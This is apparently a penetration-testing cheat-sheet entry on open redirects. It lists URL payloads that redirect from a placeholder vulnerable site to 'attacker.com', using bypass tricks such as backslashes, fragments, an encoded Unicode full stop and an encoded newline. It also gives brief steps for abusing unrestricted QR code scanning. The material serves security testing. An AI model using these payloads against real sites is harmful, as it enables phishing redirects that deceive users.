Open Redirect

It accepts a user-controlled input that specifies a link to an external site and uses that link in a redirect.

Payloads

https://vulnerable.com/example.php?redirectUrl=https://attacker.com/
https://vulnerable.com/example.php?redirectUrl=https:\\attacker.com\
https://vulnerable.com/example.php?redirectUrl=https://attacker.com#.vulnerable.com/
<!-- "%E3%80%82" is "." -->
https://vulnerable.com/example.php?redirectUrl=https://attacker.com%E3%80%82%23.vulnerable.com/
<!-- "%0d" is newline  -->
https://vulnerable.com/example.php?redirectUrl=/%0d/attacker.com/

Unrestricted QR Code Scanning

Reference: https://shahjerry33.medium.com/open-redirection-qr-code-magic-18ace1a0170f

If website (or mobile application) has the function for scanning QR code but not restricts URL, we can let it to read malicious QR code.

1. Generate QR Code

First, we need to create a malicious QR code. There are many online tools for generating it.

2. Read Malicious QR Code in the Application

After generating the QR code, read the QR code in the target application.
If the application does not validate the URL, we can access to the malicious URL.